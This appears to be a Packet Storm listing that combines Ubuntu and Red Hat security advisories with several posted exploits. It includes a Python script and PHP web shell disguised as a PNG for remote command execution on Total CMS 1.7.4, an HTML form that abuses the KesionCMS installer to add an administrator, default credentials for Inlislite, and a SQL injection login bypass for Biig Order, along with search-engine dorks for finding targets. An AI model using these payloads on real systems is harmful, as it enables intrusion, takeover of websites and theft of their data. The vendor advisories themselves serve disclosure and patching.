Ubuntu Security Notice 6131-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6131-1June 01, 2023linux, linux-aws, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4,linux-gke, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-kvm, linux-oracle, linux-oracle-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systemsDetails:Patryk Sondej and Piotr Krysiuk discovered that a race condition existed inthe netfilter subsystem of the Linux kernel when processing batch requests,leading to a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2023-32233)Gwangun Jung discovered that the Quick Fair Queueing schedulerimplementation in the Linux kernel contained an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-31436)Reima Ishii discovered that the nested KVM implementation for Intel x86processors in the Linux kernel did not properly validate control registersin certain situations. An attacker in a guest VM could use this to cause adenial of service (guest crash). (CVE-2023-30456)It was discovered that the Broadcom FullMAC USB WiFi driver in the Linuxkernel did not properly perform data buffer size validation in somesituations. A physically proximate attacker could use this to craft amalicious USB device that when inserted, could cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-1380)Jean-Baptiste Cayrou discovered that the shiftfs file system in the UbuntuLinux kernel contained a race condition when handling inode locking in somesituations. A local attacker could use this to cause a denial of service(kernel deadlock). (CVE-2023-2612)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1050-ibm      5.4.0-1050.55   linux-image-5.4.0-1070-gkeop    5.4.0-1070.74   linux-image-5.4.0-1092-kvm      5.4.0-1092.98   linux-image-5.4.0-1100-gke      5.4.0-1100.107   linux-image-5.4.0-1102-oracle   5.4.0-1102.111   linux-image-5.4.0-1103-aws      5.4.0-1103.111   linux-image-5.4.0-1106-gcp      5.4.0-1106.115   linux-image-5.4.0-1109-azure    5.4.0-1109.115   linux-image-5.4.0-150-generic   5.4.0-150.167   linux-image-5.4.0-150-generic-lpae  5.4.0-150.167   linux-image-5.4.0-150-lowlatency  5.4.0-150.167   linux-image-aws-lts-20.04       5.4.0.1103.100   linux-image-azure-lts-20.04     5.4.0.1109.102   linux-image-gcp-lts-20.04       5.4.0.1106.108   linux-image-generic             5.4.0.150.148   linux-image-generic-lpae        5.4.0.150.148   linux-image-gke                 5.4.0.1100.105   linux-image-gke-5.4             5.4.0.1100.105   linux-image-gkeop               5.4.0.1070.68   linux-image-gkeop-5.4           5.4.0.1070.68   linux-image-ibm                 5.4.0.1050.76   linux-image-ibm-lts-20.04       5.4.0.1050.76   linux-image-kvm                 5.4.0.1092.87   linux-image-lowlatency          5.4.0.150.148   linux-image-oem                 5.4.0.150.148   linux-image-oem-osp1            5.4.0.150.148   linux-image-oracle-lts-20.04    5.4.0.1102.95   linux-image-virtual             5.4.0.150.148Ubuntu 18.04 LTS:   linux-image-5.4.0-1050-ibm      5.4.0-1050.55~18.04.1   linux-image-5.4.0-1102-oracle   5.4.0-1102.111~18.04.1   linux-image-5.4.0-1106-gcp      5.4.0-1106.115~18.04.1   linux-image-5.4.0-1109-azure    5.4.0-1109.115~18.04.1   linux-image-5.4.0-150-generic   5.4.0-150.167~18.04.1   linux-image-5.4.0-150-generic-lpae  5.4.0-150.167~18.04.1   linux-image-5.4.0-150-lowlatency  5.4.0-150.167~18.04.1   linux-image-azure               5.4.0.1109.82   linux-image-gcp                 5.4.0.1106.82   linux-image-generic-hwe-18.04   5.4.0.150.167~18.04.121   linux-image-generic-lpae-hwe-18.04  5.4.0.150.167~18.04.121   linux-image-ibm                 5.4.0.1050.61   linux-image-lowlatency-hwe-18.04  5.4.0.150.167~18.04.121   linux-image-oem                 5.4.0.150.167~18.04.121   linux-image-oem-osp1            5.4.0.150.167~18.04.121   linux-image-oracle              5.4.0.1102.111~18.04.74   linux-image-snapdragon-hwe-18.04  5.4.0.150.167~18.04.121   linux-image-virtual-hwe-18.04   5.4.0.150.167~18.04.121After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6131-1   CVE-2023-1380, CVE-2023-2612, CVE-2023-30456, CVE-2023-31436,   CVE-2023-32233Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-150.167   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1103.111   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1109.115   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1106.115   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1100.107   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1070.74   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1050.55   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1092.98   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1102.111   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1109.115~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1106.115~18.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-150.167~18.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1050.55~18.04.1   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1102.111~18.04.1

Ubuntu Security Notice USN-6131-1

Ubuntu Security Notice 6129-1 - It was discovered that Avahi incorrectly handled certain DBus messages. A local attacker could possibly use this issue to cause Avahi to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6129-1  
June 01, 2023

avahi vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Avahi could be made to crash if it received specially crafted DBus traffic.

Software Description:  
- avahi: IPv4LL network address configuration daemon

Details:

It was discovered that Avahi incorrectly handled certain DBus messages. A  
local attacker could possibly use this issue to cause Avahi to crash,  
resulting in a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   avahi-daemon                    0.8-6ubuntu1.23.04.1

Ubuntu 22.10:  
   avahi-daemon                    0.8-6ubuntu1.22.10.1

Ubuntu 22.04 LTS:  
   avahi-daemon                    0.8-5ubuntu5.1

Ubuntu 20.04 LTS:  
   avahi-daemon                    0.7-4ubuntu7.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6129-1  
   CVE-2023-1981

Package Information:  
   https://launchpad.net/ubuntu/+source/avahi/0.8-6ubuntu1.23.04.1  
   https://launchpad.net/ubuntu/+source/avahi/0.8-6ubuntu1.22.10.1  
   https://launchpad.net/ubuntu/+source/avahi/0.8-5ubuntu5.1  
   https://launchpad.net/ubuntu/+source/avahi/0.7-4ubuntu7.2

Ubuntu Security Notice USN-6129-1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.4.0

Total CMS version 1.7.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

Total CMS 1.7.4 Shell Upload

KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS ASP v9.5 Reinstall Add Admin Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] at Line 09 & 16 change the domain name of target .

[+] The infected folder is /install/  
    This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation  
    The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.   
  For this, the vulnerability can be exploited through the direct link or using the exploitation written below

[+] Exploit

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.target.127.0.0.1/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS ASP 9.5 Add Administrator

Ubuntu Security Notice 6128-2 - USN-6128-1 fixed a vulnerability in CUPS. This update provides the corresponding update for Ubuntu 16.04 ESM. It was discovered that CUPS incorrectly handled logging. A remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6128-2June 01, 2023cups vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:CUPS could be made to crash or run programs if it received speciallycrafted network traffic.Software Description:- cups: Common UNIX Printing System(tm)Details:USN-6128-1 fixed a vulnerability in CUPS. This update providesthe corresponding update for Ubuntu 16.04 ESM.Original advisory details: It was discovered that CUPS incorrectly handled logging. A remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS (Available with Ubuntu Pro):  cups                            2.1.3-4ubuntu0.11+esm2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6128-2  https://ubuntu.com/security/notices/USN-6128-1  CVE-2023-32324

Ubuntu Security Notice USN-6128-2

Inlislite version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  | # Dork      : Inlislite V3.1 © 2017 - 2018                                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin[+] https://127.0.0.1.online/backend/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Inlislite 3.1 Insecure Settings

Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ================================================================================| # Title     : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability        || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "shop_detail.php?detail="                                      |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Biig Order CMS 2 SQL Injection

Ubuntu Security Notice 6128-1 - It was discovered that CUPS incorrectly handled logging. A remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6128-1  
June 01, 2023

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

CUPS could be made to crash or run programs if it received specially  
crafted network traffic.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

It was discovered that CUPS incorrectly handled logging. A remote attacker  
could use this issue to cause CUPS to crash, resulting in a denial of  
service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   cups                            2.4.2-3ubuntu2.1

Ubuntu 22.10:  
   cups                            2.4.2-1ubuntu2.1

Ubuntu 22.04 LTS:  
   cups                            2.4.1op1-1ubuntu4.2

Ubuntu 20.04 LTS:  
   cups                            2.3.1-9ubuntu1.3

Ubuntu 18.04 LTS:  
   cups                            2.2.7-1ubuntu2.10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6128-1  
   CVE-2023-32324

Package Information:  
   https://launchpad.net/ubuntu/+source/cups/2.4.2-3ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cups/2.4.2-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cups/2.4.1op1-1ubuntu4.2  
   https://launchpad.net/ubuntu/+source/cups/2.3.1-9ubuntu1.3  
   https://launchpad.net/ubuntu/+source/cups/2.2.7-1ubuntu2.10

Ubuntu Security Notice USN-6128-1

Red Hat Security Advisory 2023-3415-01 - Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes security and bug fixes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: ACS 4.0 enhancement and security update  
Advisory ID:       RHSA-2023:3415-01  
Product:           Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3415  
Issue date:        2023-05-31  
CVE Names:         CVE-2023-24539 CVE-2023-24540 CVE-2023-29400   
=====================================================================

1. Summary:

Updated images are now available for Red Hat Advanced Cluster Security  
(RHACS). The updated image includes security and bug fixes.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of RHACS 4.0.2 includes security fixes for CVE-2023-24540,  
CVE-2023-24539 and CVE-2023-29400 by building RHACS with updated Golang  
builder. If you are using an earlier version of RHACS 4.0, you are advised  
to upgrade to this patch release 4.0.2.

Security Issue(s) fixed:

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes

5. JIRA issues fixed (https://issues.redhat.com/):

ROX-17407 - Release RHACS 4.0.2

6. References:

https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/acs/4.0/release_notes/40-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHfqCtzjgjWX9erEAQhE8w/+NSnUMBg12C1Kzck6lbqqR4tVyGzJVzEA  
5ebMpDvg/eOAyyScsyQCd6FDNLPZbOX06NAgnH2c5SYmyq4I1Pkgnd4RTWzGxpnv  
Jax7t8eUYAGYmWRDo4WpllS9fgQrnvSavrEjfeRYGBlZIRgeI9XA79/+qG0fcAWv  
0bTn9cmdMioIK9oiGwAaIxEJFwDYNqWOFfvkIgZMQear3qdT3SCWRZC7rXlvtKKx  
RnveeifDV8i5O+Gr0fSGBRI7ABtxI8IhUsUufons1CjLoC9sKs8jUJ614JaEBzWj  
/heAz++wQzy/AGbbhUHearEc94SruTRitig7uF2ccyiXCbW5o4U0+6c0AaI6cktB  
vgMPHmNZIx2RBBXrGjJ1/e9Ox8me+/6wP8WDp9ZjUeHbzNmqpuRjq158qBhhj3lr  
5yS7G/+130+u4V4xNs8SNjfZoIryflB/GpX6mENrz/9Rxcrb4lJ4vs7Lo5juIHc1  
/IpNWFzrdXdYTSI47bqn6xicOkEEtrmdcc52cQSzwHhLfduuCed2egSD4uW9kPWr  
l2uivJeSUwTHKI+F2yQGBZs7aBTuddYQch6i2KNqX8bc2uSsHz24o/igO7SkPtoL  
SHOzE9VWdksOCNFG2xTYo5aEN8ihyNA3tw9YQakmEtfoN1PvOQkYNyIlahl2kxd0  
eXjkc2clfQE=  
=9iD6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm